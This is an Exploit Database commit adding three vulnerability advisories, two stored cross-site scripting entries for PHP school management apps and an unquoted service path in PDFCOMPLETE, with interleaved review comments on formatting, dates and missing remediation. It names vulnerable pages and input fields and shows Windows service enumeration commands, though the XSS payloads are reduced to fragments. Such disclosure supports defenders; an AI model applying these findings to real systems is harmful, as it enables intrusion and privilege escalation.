From 774f3786de9a1955a47663aaaa1ca8e960cff34c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 13 Feb 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-02-13

3 changes to exploits/shellcodes

PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
---
 exploits/php/webapps/49559.txt | 18 ++++++++++++++++++
 exploits/php/webapps/49560.txt | 19 +++++++++++++++++++
 exploits/windows/local/49558.txt | 28 ++++++++++++++++++++++++++++
 files_exploits.csv | 3 +++
 4 files changed, 68 insertions(+)
 create mode 100644 exploits/php/webapps/49559.txt
 create mode 100644 exploits/php/webapps/49560.txt
 create mode 100644 exploits/windows/local/49558.txt

diff --git a/exploits/php/webapps/49559.txt b/exploits/php/webapps/49559.txt
new file mode 100644
index 000000000..ec76281f4
--- /dev/null
+++ b/exploits/php/webapps/49559.txt
@@ -0,0 +1,18 @@
+# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Pintu Solanki
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software: : School File Management System 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+# Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php
+# Vulnerable functionality: 'Update Account'
+# Vulnerable Input Field : {Firtstname} {Lastname}
+# Payload used:
+
+">
+
+# POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
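Review bot: The advisory records where the stored XSS lands (the Firstname/Lastname fields of 'Update Account', rendered on student_profile.php) but gives no impact statement or remediation, and the `# Payload used:` block on the new side holds only `">`, so a reader cannot tell what was actually stored; the 49560 hunk has the same gaps. A closing line such as `# Remediation: validate the profile fields server-side and HTML-encode them (e.g. htmlspecialchars() with ENT_QUOTES) wherever student_profile.php renders them` would make the entry actionable for defenders. Two header typos are worth fixing in the same pass: `# Software: :` carries a doubled colon and `{Firtstname}` should read `{Firstname}`.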
diff --git a/exploits/php/webapps/49560.txt b/exploits/php/webapps/49560.txt
new file mode 100644
index 000000000..da6f727ca
--- /dev/null
+++ b/exploits/php/webapps/49560.txt
@@ -0,0 +1,19 @@
+# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Suresh Kumar
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html
+# Software: School Event Attendance Monitoring System 1.0
+# Tested on Windows 10 XAMPP
+
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable Page: http://localhost/attendance/sanction
+# Vulnerable functionality: 'Add Sanction '
+# Vulnerable Input Field : Item Name
+# Payload used:
+
+">
+
+# POC: Whenever we will go to the page (http://localhost/attendance/sanction)
+where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
diff --git a/exploits/windows/local/49558.txt b/exploits/windows/local/49558.txt
new file mode 100644
index 000000000..7aafa945b
--- /dev/null
+++ b/exploits/windows/local/49558.txt
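Review bot: The `# POC:` paragraph is split across two lines and the continuation `where the script is injected, the stored script will be executed.` lacks the `#` prefix every other descriptive line carries, so it reads as part of the payload rather than the explanation; either join it to the preceding line or prefix it with `# `. The header `# Tested on Windows 10 XAMPP` also drops the `Tested on:` key form used by the sibling advisories in this commit, which makes the header set inconsistent across the three new files. The trailing space inside `'Add Sanction '` looks unintended as well.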
@@ -0,0 +1,28 @@
+# Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 02-11-2020
+# Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r
+# Software Links : https://pdf-complete.informer.com/download/
+# Tested Version: 4.1.45
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+PDF Document Manager pdfcDispatcher C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto
+
+
+C:\>sc qc pdfcDispatcher
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: pdfcDispatcher
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : PDF Document Manager
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e89ef55e2..8a358c782 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
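Review bot: The `sc qc` output establishes an unquoted binary path `C:\Program Files (x86)\PDF Complete\pdfsvc.exe` running as LocalSystem with AUTO_START, but the advisory never shows the ACLs of `C:\` or `C:\Program Files (x86)\`, so a reader cannot judge whether a non-administrative user can actually place a file there; without that evidence this is a configuration weakness rather than a demonstrated privilege escalation, and an `icacls` listing of those two directories would close the gap. A remediation line is also missing; quoting the binary path in the service configuration (by the vendor's installer, or administratively via `sc config pdfcDispatcher binPath= ...` with the executable path enclosed in escaped quotes) removes the ambiguity. `# Discovery Date: 02-11-2020` conflicts with the 2021-02-12 date the files_exploits.csv row gives this entry and with the commit date, so the year looks like a typo to confirm with the author. The Spanish-locale field names (NOMBRE_RUTA_BINARIO, NOMBRE_INICIO_SERVICIO) correspond to BINARY_PATH_NAME and SERVICE_START_NAME and could be glossed for readers.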
@@ -11234,6 +11234,7 @@ id,file,description,date,author,type,platform,port
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
+49558,exploits/windows/local/49558.txt,"PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path",2021-02-12,"Ismael Nava",local,windows,
 49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,
 49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
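Review bot: The new row for 49558 is placed between 49259 and 49322 although every surrounding row is in ascending id order, and the second hunk inserts 49559 and 49560 between 49262 and 49264 the same way; if these sections are meant to stay sorted by id, the three rows belong wherever their ids sort. The row's date `2021-02-12` also disagrees with the advisories themselves (`# Discovery Date: 02-11-2020` in 49558.txt, `# Date: 2021-02-11` in 49559.txt and 49560.txt), so one side should be corrected. Note too that 49226 in the same context already indexes an unquoted service path for the same `pdfsvc.exe` binary in an older PDF Complete release; it is worth confirming that 49558 is a distinct finding for 4.1.45 rather than a duplicate.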
@@ -43528,6 +43529,8 @@ id,file,description,date,author,type,platform,port
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
 49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49559,exploits/php/webapps/49559.txt,"School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-12,"Pintu Solanki",webapps,php,
+49560,exploits/php/webapps/49560.txt,"School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting",2021-02-12,"Suresh Kumar",webapps,php,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,